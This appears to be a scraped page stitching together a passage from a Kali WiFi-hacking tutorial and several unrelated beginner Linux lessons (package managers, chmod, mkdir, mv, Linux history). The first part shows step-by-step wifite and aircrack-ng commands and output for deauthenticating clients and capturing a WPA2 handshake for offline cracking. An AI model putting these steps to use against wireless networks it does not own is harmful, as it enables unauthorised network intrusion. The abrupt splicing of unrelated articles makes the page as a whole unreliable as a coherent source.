[+] 0/2 WPA attacks succeeded
[+] disabling monitor mode on mon0… done
[+] quitting

Now I connected my other PC to ‘me’. Lets do it again. This time a client will show up, and wifite will de-authenticate it, and it’ll try to connect again. Lets see what happens this time around.

   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
— ——————–  —  —-  —–  —-  ——
1  *    1  WPA   99db    no   client
2  me  1 WPA2  47db   wps   client
3  *    11  WEP   22db    no   clients
4  *   11  WEP   20db    no

[+] select target numbers (1-4) separated by commas, or ‘all’: 2
[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:07] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on “me”
[0:07:51] listening for handshake…
(^C) WPA handshake capture interrupted
[+] 2 attacks completed:
[+] 0/2 WPA attacks succeeded
[+] quitting

Now the deauth attacks weren’t working. This time I increased the deauth frequency.
root@kali:~# wifite -wpadt 1
Soon, however, I realized, that the problem was that I was using my internal card (Kali Live USB). It does not support packet injection, so deauth wasn’t working. So time to bring my external card to the scene.

root@kali:~# wifite
.;’                     `;,
.;’  ,;’             `;,  `;,   WiFite v2 (r85)
.;’  ,;’  ,;’     `;,  `;,  `;,
::   ::   :   ( )   :   ::   ::  automated wireless auditor
‘:.  ‘:.  ‘:. /_ ,:’  ,:’  ,:’
‘:.  ‘:.    /___    ,:’  ,:’   designed for Linux
‘:.       /_____      ,:’
/      

[+] scanning for wireless devices…
[+] available wireless devices:
1. wlan1        Ralink RT2870/3070    rt2800usb – [phy1]
2. wlan0        Atheros     ath9k – [phy0]
[+] select number of device to put into monitor mode (1-2):

See, we can use the USB card now. This will solve the problems for us.
Now look at wifite output

   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
— ——————–  —  —-  —–  —-  ——
1  me                     1  WPA2  44db   wps   client
2  *                       11  WEP   16db    no   client
3  *                         11  WEP   16db    no

[+] select target numbers (1-3) separated by commas, or ‘all’:
Now I attack the target. This time, finally, I captured a handshake.
[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:01] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on “me”
[0:07:23] listening for handshake…
[0:00:57] handshake captured! saved as “hs/me_02-73-8D-**-**-**.cap”
[+] 2 attacks completed:
[+] 1/2 WPA attacks succeeded
me (02:73:8D:37:A7:ED) handshake captured
saved as hs/me_02-73-8D-**-**-**.cap

[+] starting WPA cracker on 1 handshake
[!] no WPA dictionary found! use -dict <file> command-line argument
[+] disabling monitor mode on mon0… done
[+] quitting

As you can see, it took me 57 seconds to capture the handshake (5 deauth requests were sent, one every 10 secs is defualt). The no dictionary error shouldn’t bother you. We’ll use Wifite only to capture the handshake. Now the captured handshake was saved as a .cap file which can be cracked using aircrack, pyrit, hashcat (after converting .hccap), etc. using either a wordlist or bruteforce. Let’s see how to do the same thing with airodump-ng. This time I won’t show you the problems you might run into. It’ll be a perfect ride, all the problems were seen in wifite case.

Capturing Handshake with Airodump-ng

Now if you skipped everything and got right here, then you are missing a lot of things. I’ll end this pretty quick, as the wifite thing was quite detailed. I’m copying stuff from http://www.kalitutorials.net/2013/08/wifi-hacking-wep.html where I already discussed airodump-ng. (If you are not a newbie, skip to the point where you see red text)

1. Find out the name of your wireless adapter.

Alright, now, your computer has many network adapters, so to scan one, you need to know its name. So there are basically the following things that you need to know-

• lo – loopback. Not important currently.
• eth – ethernet
• wlan – This is what we want. Note the suffix associated.

Now, to see all the adapters, type ifconfig on a terminal. See the result. Note down the wlan(0/1/2) adapter.

Trouble with the wlan interface not showing up. This is because virtual machines can’t use internal wireless cards and you will have to use external cards. You should try booting Kali using Live USB (just look at the first part of this tutorial), or buy an external card.

2. Enable Monitor mode

Now, we use a tool called airmon-ng to  create a virtual interface called mon. Just type

airmon-ng start wlan0

 Your mon0 interface will be created.

3. Start capturing packets

Now, we’ll use airodump-ng to capture the packets in the air. This tool gathers data from the wireless packets in the air. You’ll see the name of the wifi you want to hack.

airodump-ng mon0

 

4. Store the captured packets in a file

This can be achieved by giving some more parameters with the airodump command

airodump-ng mon0 –write name_of_file

Non newbies-
root@kali:~# airmon-ng start wlan1
root@kali:~# airodump-ng mon0 -w anynamehere

 Now copy the bssid field of your target network (from airodump-ng ng screen)and launch a deauth attack with aireplay-ng

 root@kali:~# aireplay-ng –deauth 0 -a BSSID here mon0

The –deauth tells aireplay to launch a deauth attack. 0 tell it to fire it at interval of 0 secs (very fast so run it only for a few secs and press ctrl+c). -a will required BSSID and replace BSSID here with your target BSSID. mon0 is the interface you created.
In case you face problems with the monitor mode hopping from one channel to another, or problem with beacon frame, then fix mon0 on a channel using-
root@kali:~# airodump-ng mon0 -w anynamehere -c 1
Replace 1 with the channel where your target AP is. You might also need to add –ignore-negative-one if aireplay demands it. In my case airodump-ng says fixed channel mon0: -1 so this was required. (It’s a bug with aircrack-ng suite). 

Now when you look at the airodump-ng screen, you’ll see that at the top right it says WPA handshake captured . Here is what it looks like

 CH  1 ][ Elapsed: 24 s ][ 2014-06-13 22:41 ][ WPA handshake: **

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

02:73:8D:37:A7:ED  -47  75      201       35    0   1  54e  WPA2 CCMP   PSK  me

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

*                     *                            0    0e- 1    742       82  me
*                       *                           -35  0e- 1      0   26

You can confirm it by typing the following

root@kali:~# aircrack-ng anynamehere-01.cap
Opening anynamehere-01.cap
Read 212 packets.
#  BSSID              ESSID                     Encryption
1  **************  me                        WPA (1 handshake)
2  **                          Unknown

Installing new software on Linux (Debian, Red Hat, Slackware)

Installing new software on Linux (Debian, Red Hat, Slackware)

Debian:
There are various methods to installing new programs on a Debian system. I like to classify them according to your connection type.

Code:

dpkg

This is the “classic” way of updating a Debian system. Typically, you could go to Debian’s website or any one of its mirrors and download a package.

Code:

dpkg -i package.deb

to install it.

The main drawback to this is that you may find a package that you like but it may have dependencies (ie. other programs that it needs to make it run) and if you don’t have those packages, then the install will fail.

This is what the Debian people themselves have to say about this method:

Many people find this approach much too time-consuming, since Debian evolves so quickly — typically, a dozen or more new packages are uploaded every week. This number is larger just before a new major release. To deal with this avalanche, many people prefer to use automated programs.

Despite what they say, the main advantage of dpkg, it seems to me, is that it is easy for people who have dial-up connections. This is because the alternative, automated programs they’re talking about, which are dselect and apt-get are better for permanent connections (cable, xDSL, T1, T3). Let’s talk about this method of installing new programs with Debian.

Code:

dselect

When you use dselect you get a graphic user interface of sorts (not under X window, though) to guide you through the install of new programs.

First you’ll get asked for your preferred access method. That means, how you’re going to get and install them. For example, if I were doing an install of Debian with CDs, then I would choose CD-ROM. But if I were updating, I would choose FTP

Then you would choose the packages you want with a + sign. You can even put updates on hold (indicate that you want to update, but not actually do it) with a = sign. There may even be conflicts or dependency problems and ‘dselect’ will warn you about those.

Then you start the process by choosing the install option.

Debian will then configure the installed packages.

Then you’re on your way.

As I said before, the main advantage to this is that any conflicts or dependency problems will be resolved right here. The Debian people point out that this is ideal for installs or large-scale upgrades. If that’s the case, it seems that a slow and sometimes expensive dial-up connection would be less than ideal for this.

Red Hat:
The way you install a new program will depend primarily on two things:

1) What distribution (version) of Linux are you using?
2) What is the origin of the program that you want to install?

RPM

If you’re using Red Hat or a distribution that bases itself on Red Hat, then you’re going to use the RPM method. OK racing fans- RPM doesn’t have anything to do with revolutions per minute. It stands for Red Hat PackageManager. This system takes the heartache out of installing programs under Linux, for the most part. You can go to the Red Hat website or any number of mirrors and get programs for Linux. Developers will almost always offer their programs in RPM format due to its popularity. I also want to note that RPM has also come to mean the package itself (as in &quot;I downloaded an RPM yesterday&quot.

There are some basic commands you’re going to need to know to take advantage of the RPM system.

Code:

rpm -i new_program.rpm

This installs the program (-i option for install)

Code:

rpm -q program_name

This &quot;queries&quot; your system to see if you’ve got a certain program installed. Let’s say you hear there’s a new version of the popular Internet browser Opera for Linux and you don’t know if your Red Hat based distribution installs this by default or not. Before you download the RPM for Opera, you could type the command:

Code:

rpm -q opera

If you do have the package installed, it would give you the version number:

opera-11.62

If you don’t have the package installed, you will see:

package opera is not installed

If you don’t have Opera installed, then you can download their RPM and run rpm -i opera_whatever_version.rpm as root and install the program.

If you do have the program installed and the rpm -q opera command gives you a older version number and you want the newerone, then you have two options.

One is to “uninstall” the older package and install a new one in its place. Not that this is the most efficient option. I just wanted to introduce you to the -e option for RPM. That is, to get rid of a program that you’ve installed, you would type rpm -e program_name. For example, if you’ve got Opera’s beta version 7 and you’ve just downloaded the beta version 8, then you would first do:

Code:

rpm -e opera

This gets rid of Opera from your system. Then you would type rpm -i opera_beta8.rpm (or whatever the package is actually called). That installs the new version.

As I said, this is not the most efficient way to update packages. The usual way is to use the -U (as inUpdate command.

You would type:

Code:

rpm -U opera_new_version.rpm

and that would install the new version and remove the old version from your system.

Those are the basic commands of the RPM install/update system in a nutshell.

When you’re using your windows manager, there are some very good tools for installing, updating and uninstalling RPMs that are graphically based. You can choose menu options to do all that we explained before instead of having to type the commands in the terminal. You may want to look into programs like Kpackage for KDE orGnome RPM for the GNOME enviroment. They may make these tasks a lot easier, especially if you’re just starting out in the Linux world.

Some words of caution on downloading RPMs

Some of the most popular Linux distributions base their install and update prodedures on Red Hat’s package management system. These include Mandrake and SuSE for example. Both of these companies create their own RPMs to be specifically installed on their systems. That means if you’re using SuSE or Mandrake your best bet is to go to their respective &quot;official&quot; websites or mirrors and download their particular RPM and install it using the procedure outlined above or their specific tools. You may run into a problem if you installed an RPM for Red Hat on a SuSE system. Certain components in the package (like documentation or libraries) may get copied into a different directory than was intended for that system. Third party RPMs from reputable companies, like the Opera web browser in mentioned above, should install fine on any RPM based system. I have successfully installed this package (the same exact RPM file) on SuSE, Mandrake and Red Hat. I even converted this RPM to Debian (.deb) package format and successfully installed it in a computer running Debian. More on this conversion later in the show!

Just a brief second word of caution. Getting and RPM doesn’t necessarily mean that you’re automatically (or “auto-magically”) going to be able to install it. Many websites out there offer RPMs for download. The good ones usually include a list on that particular RPM’s page of other programs or libraries that you need in order successfully install and use the program. If you see a list a mile long of “requirements” (those other programs and libraries you need), then you might want to ask yourself if you really want to try that program out.

And here’s just an editorial comment on my part about this type of thing as well. The big buzz word with Linux is “free”. That’s fine. You can theoretically get a distribution from the Internet along with programs and install it for free. (ie. no money down). I think, however, that time is money, to use the trite expression. Time might be even more valuable than money. (lost money might be re-earned but not lost time). When I first installed Linux oh so many years ago, updating and installing stuff was at times a frustrating experience. I suggest that newcomers to the Linux world buy (yes, I said buy) a good boxed set of a commercial distribution and then they’ll have more programs than they would ever need, all installed and working properly along with a manual to tell you what to doin case something doesn’t work.

Code:

yum

Yum is a package manager that was developed by Duke University to improve the installation of RPMs. Yum searches numerous repositories for packages and their dependencies so they may be installed together in an effort to alleviate dependency issues. Red Hat Enterprise Linux 5 uses Yum to fetch packages and install RPMs and well as many Red Hat derivatives like CentOS and Fedora Core.

Yum uses a configuration file at /etc/yum.conf.

There are multiple ways by which you can install a repository on the system and install/update packages :

Code:

yum search package_name
yum info package_name
yum install package_name
yum update package_name
yum remove package_name

Slackware:

Slackware, known to the Linux world as &quot;Slack&quot;, has the reputation of being, on one hand, a flexible distribution that allows you to do practically anything you want and, on the other hand, one that is for “experienced” Linux users only.

A lot of these considerations are “politically” motivated. Slackware lacks some of the “smooth” and “slick” graphic installation packages that are becoming standard fare in commercial companies’ offerings but in the end, if you’re willing to just use the command line utilities, it’s just as easily updated as any other major distribution.

Slackware’s package format

Slackware packages come in *.tgz format. This a variation of the *.tar.gz format we’ve seen before. You can go to your favorite website and download new programs for your Slackware system and with a simple:

Code:

installpkg some_program.tgz

you have your new program installed.

If that particular package doesn’t quite move you and inspire you too much, you can just remove it:

Code:

removepkg some_program.tgz

You can also add the option -warn between the installpkg/removepkg command and instead of installing the package, it will tell you what new files are going to get added to your hard disk. That’s a good option for the “I wonder if I want this” moments of your life.

Upgrading packages

You can upgrade programs to newer versions with this command:

Code:

upgradepkg a_new_version_of_something.tgz

Using other package formats

If you’re using Slackware and you can’t find a package your looking for in the *.tgz format, you can also grab on to an *.rpm and convert it.

The way to do this is:

 

Code:

rpm2tgz some_package.rpm

This takes the rpm in question and converts it to *.tgz format. Then you can use installpkg on the new file you’ve created to install it.

GUI does not necessarily = GOOD

Once again, there is a common misconception that just because something doesn’t have a wonderful graphic interface that makes you say &quot;oooh&quot; and &quot;ahhhh&quot;, it is somehow inferior. Don’t let that missing GUI fool you here. A computer running Slackware is a tremendously flexible and configurable system. So what if you have to write things on a command line? That’s what you’ve got a keyboard for, isn’t it?

Enjoy your Slack system!

Linux mkdir and rmdir commands

‘mkdir’ is the command for making directories. ‘mkdir’ may be familiar to MS-DOS users out there. As you have noticed, the people who wrote these programs tried to give them names that described what they do more or less, not as long as ‘makemeadirectoryplease’ and not too cryptic like ‘xr77b’.

Using the ‘mkdir’ command

To create the directory ‘my_friends’ that we talked about in the last lesson, you would type:

Code:

mkdir my_friends

There are no whistles or buzzers. If you’d like some sort of acknowledgment, you could type

Code:

mkdir --verbose my_friends

and it will tell you that you created the directory.

If you type ls -l You’ll see it there along with information about it.

Now you know how to use ‘mkdir’. You can even use it to create a directory called ‘my_enemies’ if you’re into that sort of thing.

The ‘rmdir’ command

‘rmdir’ is the opposite of ‘mkdir’- it gets rid of directories. It should be pointed out that in order to use it, the directory has to be empty. If you copied or moved anything to ‘my_friends’ and you typed

Code:

rmdir my_friends/

Linux would politely tell you that you can’t do that.

So, you have to use your ‘rm’ command on the files first to remove them or use ‘mv’ to get them into another directory. Then you’re free to use ‘rmdir’

Linux File Permissions – chmod

Linux has inherited ownership concept from UNIX and permissions for files. 

As we mentioned at the beginning of this course, the big advantage that Linux has is its multi-user concept- the fact that many different people can use the same computer or that one person can use the same computer to do different jobs. That’s where the system of file permissions comes in to help out in what could be a very confusing situation. We’re going to explain some basic concepts about who owns the file and who can do what with a file. We won’t get into an enormous amount of detail here. We’ll save that for the Linux system administration course. We will show you how to understand file permission symbols and how to modify certain files so that they’re more secure.

File permission symbols

If you run the command

Code:

ls -l

in your home directory, you will get a list of files that may include something like this

Code:

-rw-r--r--  1  bob  users  1892  Jul 10  18:30 linux_course_notes.txt

This basically says, interpreting this from RIGHT to LEFT that the file, linux_course_notes.txt was created at 6:30 PM on July 10 and is 1892 bytes large. It belongs to the group users (i.e, the people who use this computer). It belongs to bob in particular and it is one (1) file. Then come the file permission symbols.

Let’s look at what these symbols mean:

The dashes – separate the permissions into three types

The first part refers to the owner’s (bob’s) permissions.

The dash – before the rw means that this is a normal file that contains any type of data. A directory, for example, would have a d instead of a dash.

The rw that follows means that bob can read and write to (modify) his own file. That’s pretty logical. If you own it, you can do what you want with it.

The second part of the these symbols after the second dash, are the permissions for the group. Linux can establish different types of groups for file access. In a one home computer environment anyone who uses the computer can read this file but cannot write to (modify) it. This is a completely normal situation. You, as a user, may want to take away the rights of others to read your file. We’ll cover how to do that later.

After the two dashes (two here because there is no write permissions for the group) come the overall user permissions. Anyone who might have access to the computer from inside or outside (in the case of a network) can read this file. Once again, we can take away the possibility of people reading this file if we so choose.

Let’s take a look at some other examples. An interesting place to look at different kinds of file permissions is the /bin directory. Here we have the commands that anybody can use on the Linux system. Let’s look at the command for gzip, a file compression utility for Linux.

Code:

-rwxr-xr-x  1 root    root        53468 May  1  1999 gzip

As we see here, there are some differences.

The program name, date, bytes are all standard. Even though this is obviously different information, the idea is the same as before.

The changes are in the owner and group. Root owns the file and it is in the group &quot;root&quot;. Root is actually the only member of that group.

The file is an executable (program) so that’s why the letter x is among the symbols.

This file can be executed by everybody: the owner (root), the group (root) and all others that have access to the computer

As we mentioned, the file is a program, so there is no need for anybody other than root to “write” to the file, so there is no w permissions for it for anybody but root.

If we look at a file in /sbin which are files that only root can use or execute, the permissions would look like this:

Code:

-rwxr--r--  1 root    root        1065 Jan 14  1999 cron

‘cron’ is a program on Linux systems that allows programs to be run automatically at certain times and under certain conditions. As we can see here, only root, the owner of the file, is allowed to use this program. There are no xpermissions for the rest of the users.

We hope you enjoyed this little walk-through of file permissions in Linux. Now that we know what we’re looking for, we can talk about changing certain permissions.

chmod

chmod is a Linux command that will let you &quot;set permissions&quot; (aka, assign who can read/write/execute) on a file.

Code:

chmod permissions file

Code:

chmod permission1_permission2_permission3 file

When using chmod, you need to be aware that there are three types of Linux users that you are setting permissions for. Therefore, when setting permissions, you are assigning them for &quot;yourself&quot;, “your group” and “everyone else” in the world. These users are technically know as:

Owner
Group
World

Therefore, when setting permissions on a file, you will want to assign all three levels of permissions, and not just one user.

Think of the chmod command actually having the following syntax…

chmod owner group world FileName

Now that you understand that you are setting permissions for THREE user levels, you just have to wrap your head around what permissions you are able to set!

There are three types of permissions that Linux allows for each file.

read
write
execute

Putting it all together:

So, in laymen terms, if you wanted a file to be readable by everyone, and writable by only you, you would write the chmod command with the following structure.

COMMAND : OWNER : GROUP : WORLD : PATH

chmod read & write read read FileName

Code:

chmod 644 myDoc.txt

Wait! What are those numbers?!?

Computers like numbers, not words. Sorry. You will have to deal with it. Take a look at the following output of ls -l

Code:

-rw-r--r-- 1 gcawood iqnection 382 Dec 19 6:49 myDoc.txt

You will need to convert the word read or write or execute into the numeric equivalent (octal) based on the table below.

4 read (r)
2 write
1 execute (x)

Practical Examples

chmod 400 mydoc.txt read by owner
chmod 040 mydoc.txt read by group
chmod 004 mydoc.txt read by anybody (other)
chmod 200 mydoc.txt write by owner
chmod 020 mydoc.txt write by group
chmod 002 mydoc.txt write by anybody
chmod 100 mydoc.txt execute by owner
chmod 010 mydoc.txt execute by group
chmod 001 mydoc.txt execute by anybody

Wait! I don’t get it… there aren’t enough permissions to do what I want!

Good call. You need to add up the numbers to get other types of permissions…

So, try wrapping your head around this!!

7 = 4+2+1 (read/write/execute)
6 = 4+2 (read/write)
5 = 4+1 (read/execute)
4 = 4 (read)
3 = 2+1 (write/execute)
2 = 2 (write)
1 = 1 (execute)

chmod 666 mydoc.txt read/write by anybody! (the devil loves this one!)
chmod 755 mydoc.txt rwx for owner, rx for group and rx for the world
chmod 777 mydoc.txt read, write, execute for all! (may not be the best plan in the world…)

Linux mv command

‘mv’ is a command that is used  to move files around or to rename them. ‘mv’ sort of has a split-personality because it serves these two functions at the same time.


‘mv’ command for renaming files

Let’s go back yet again to Tony’s file, ‘stuff’ again. ‘stuff’ is not a good name for a file just as ‘book’ isn’t a good name for a book. Just imagine: “The number one bestselling book this week is ‘Book’ by John Author.

You should probably re-name this file to something meaningful. I would suggest doing something like this:

Code:

mv stuff tonys_jokes

You may have noticed the underscore ‘‘ in the title. It’s there because Linux doesn’t really like spaces in the file names. You can do it and Linux will accept it but it will put a \ between the different words. Spaces are sort of ‘faux pas’ in Linux but not ‘verboten’. It would be to your advantage to use ‘‘ between words though.

Moving files with the ‘mv’ command

Now you can use the ‘mv’ command to move Tony’s jokes into the directory you made to keep his files.

Code:

mv tonys_jokes tonyd/

If you do cd tonyd and then ls to* you will see his file there along with ‘toms_jokes’ and ‘tomato_soup_recipe’. (if you have another friend named Tom and you like to cook)

You can also move entire directories with this command. You do not have to use the ‘-r’ option as you did with ‘cp’. You would just substitute the file name for a directory name

Code:

mv tonyd/ my_friends/

would move the directory ‘tonyd’ to the directory ‘my_friends’.

What Is Linux

Beginners Level Course: What is Linux?

Linux is an operating system that evolved from a kernel created by Linus Torvalds when he was a student at the University of Helsinki. Generally, it is obvious to most people what Linux is. However, both for political and practical reasons, it needs to be explained further. To say that Linux is an operating system means that it’s meant to be used as an alternative to other operating systems, Windows, Mac OS, MS-DOS, Solaris and others. Linux is not a program like a word processor and is not a set of programs like an office suite. Linux is an interface between computer/server hardware, and the programs which run on it.

A brief history of Linux
When Linus Torvalds was studying at the University of Helsinki, he was using a version of the UNIX operating system called ‘Minix’. Linus and other users sent requests for modifications and improvements to Minix’s creator, Andrew Tanenbaum, but he felt that they weren’t necessary. That’s when Linus decided to create his own operating system that would take into account users’ comments and suggestions for improvements.

Free Software pre-Linux
This philosophy of asking for users’ comments and suggestions and using them to improve computer programs was not new. Richard Stallman, who worked at the Massachusetts Institute of Technology, had been advocating just such an approach to computer programming and use since the early 1970’s. He was a pioneer in the concept of ‘free software’, always pointing out that ‘free’ means ‘freedom’, not zero cost. Finding it difficult to continue working under conditions that he felt went against his concept of ‘free software’ he left MIT in 1984 and founded GNU. The goal of GNU was to produce software that was free to use, distribute and modify. Linus Torvalds’ goal 6 years later was basically the same: to produce an operating system that took into account user feedback.

The kernel
We should point out here that the focal point of any operating system is its ‘kernel’. Without going into great detail, the kernel is what tells the big chip that controls your computer to do what you want the program that you’re using to do. To use a metaphor, if you go to your favorite Italian restaurant and order ‘Spaghetti alla Bolognese’, this dish is like your operating system. There are a lot of things that go into making that dish like pasta, tomato sauce, meatballs and cheese. Well, the kernel is like the pasta. Without pasta, that dish doesn’t exist. You might as well find some bread and make a sandwich. A plate of just pasta is fairly unappetizing.
Without a kernel, an operating system doesn’t exist. Without programs, a kernel is useless.

1991, a fateful year
In 1991, ideal conditions existed that would create Linux. In essence, Linus Torvalds had a kernel but no programs of his own, Richard Stallman and GNU had programs but no working kernel. Read the two men’s own words about this:

Linus: said:

Sadly, a kernel by itself gets you nowhere. To get a working system you need a shell, compilers, a library etc.

RMS: said:

The GNU Hurd is not ready for production use. Fortunately, another kernel is available. [It is called] Linux.So combining the necessary programs provided by GNU in Cambridge, Massachusetts and a kernel, developed by Linus Torvalds in Helsinki, Finland, Linux was born. Due to the physical distances involved, the means used to get Linus’ kernel together with the GNU programs was the Internet, then in its infancy. We can say then that Linux is an operating system that came to life on the Internet. The Internet would also be crucial in Linux’s subsequent development as the means of coordinating the work of all the developers that have made Linux into what it is today.

Linux is introduced
Late in 1991, Linus Torvalds had his kernel and a few GNU programs wrapped around it so it would work well enough to show other people what he had done. And that’s what he did. The first people to see Linux knew that Linus was on to something. At this point, though, he needed more people to help him. Here’s what Linus had to say back in 1991.

Linus: said:

Are you without a nice project and dying to cut your teeth on an OS you can try to modify for your needs?… This post might just be for you.

People all over the world decided to take him up on it. At first, only people with extensive computer programming knowledge would be able to do anything with that early public version of Linux. These people started to offer their help. The version numbers of Linux were getting higher and higher. People began writing programs specifically to be run under Linux. Developers began writing drivers for different video cards, sound cards and other gadgets inside and outside your computer could use Linux. Nevertheless, throughout most of first part of the 1990’s Linux did not get out of the ‘GURU’ stage. GURU is a term that has evolved to mean anyone who has special expertise in a particular subject. That is, you had to have special expertise in how computers worked to be able to install Linux in those days.
Linux, at first, was not for everybody

Other popular software companies sold you a CD or a set of floppies and a brief instruction booklet and in probably less than a half an hour, you could install a fully working operating system on your PC. The only ability you needed was knowing how to read. Those companies had that intention when they actually sat down and developed their operating systems. Linus Torvalds didn’t have that in mind when he developed Linux. It was just a hobby for him. Later on, companies like Red Hat made it their goal to bring Linux to the point where it could be installed just like any other operating system; by anyone who can follow a set of simple instructions, and they have succeeded. For some reason, though, Linux hasn’t completely lost its ‘Gurus only’ image. This is largely because of the popular tech press’ inability to explain in a meaningful way what Linux is. The truth is that few tech reporters have real life experience with Linux and it is reflected in their writing.

Where Linux is Today
Today, Linux is enjoying a favorable press for the most part. This comes from the fact that Linux has proven to be a tremendously stable and versatile operating system, particularly as a network server. When Linux is deployed as a web server or in corporate networks, its down-time is almost negligible. There have been cases when Linux servers have been running for more than a year without re-booting and then only taken down for a brief period for routine maintenance. Its cost effectiveness has sold it more than anything else. Linux can be installed on a home PC as well as a network server for a fraction of the cost of other companies’ software packages. More reliability and less cost – it’s ideal.

If you’re reading this, you’re obviously here to learn how to use Linux. Any learning experience means opening up to new ideas and new ways of doing things. As mentioned before, Linux is in the UNIX family of operating systems. UNIX is primarily designed to be used by professionals. You will have to learn some UNIX concepts in this lesson, but that doesn’t mean that Linux is a professionals-only operating system. In fact, most major versions of Linux are designed to be as user-friendly and as easy to install as any other operating system on the market today.

Now that you know what Linux is and how good it is, there’s one more thing we have to do – install Linux!